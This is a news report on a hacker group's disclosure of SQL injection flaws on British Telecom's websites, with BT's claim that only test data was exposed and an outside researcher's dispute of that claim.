14 DAY TRIAL // Following the disclosure of an SQL injection vulnerability affecting a section of the British Telecom website, the company claims that no customer data has been affected. Meanwhile, the hacker has published evidence of a new, more serious flaw on BT.com.
The original security breach was reported by a Romanian hacker calling himself "unu" in a post on the website of the self-proclaimed ethical hacking outfit HackersBlog. In an e-mail to Softpedia, a BT spokesperson claims that the security breach has only affected a test system. "BT has carried out a thorough investigation of this alleged breach. We have found that access was gained to a test database and therefore no customer details were revealed at any time," he writes.
"When sites are under test, they do not contain live data and are often not included within our secure network until they become operational. BT has developed rigorous, world-leading protection against unauthorised computer access in order to protect customer details and commercial interests. Where a suspected intrusion has occurred, BT will act swiftly to ensure our customer data is not at risk. Our operational systems have not been affected in any way by this attempt to break through our security," the rest of the e-mail reads.
The same statement has been apparently given to The Register, however, Rik Ferguson, solutions architect at antivirus vendor Trend Micro, has commented that "I certainly don’t have any visibility of which systems or databases were compromised, but I can confirm, through my own research, that the information made visible through the compromise is real, valid and belongs to individuals not directly employed by British Telecom."
Meanwhile, the hacker has come through with his original promise and has published more information on the security breach as an "episode 2." The new post discloses another SQL injection vulnerability, more specifically a "blind SQLi," in http://www.comparebroadband.bt.com/compare.asp. It is notable that The Internet Archive stores versions of this page dating back to as far as November 2006, making a "test server" scenario unlikely.
Furthermore, "unu" explains that "We kept on hold the publication of the vulnerable parameter, which would allow full access in ALL the databases of the main server, waiting for the issue to be solved." To back up his claims, a listing of the 37 databases has been included by the hacker. "First, database 'BT' is the most interesting one. Nonetheless, the others also yield a wealth of important data about the users: personal data, passwords, etc." he notes.
It is stressed in the new HackersBlog article that "This blind SQL Injection grants us way more access to larger parts of the databases then the one used to find the previous vulnerability in BT.com." Even so, the whitehat hacking group expresses its appreciation for the professionalism and manners displayed by BT when handling this incident and "unu" advises caution.
"Dont rush to conclusions and start pointing figers [sic.] before you see the next articles where we will show similar issues with other large telecommunication providers. As we said earlier, we don't take sides, but rather want to show that the above mentioned vulns cand [sic.] be found almost everywhere," he writes.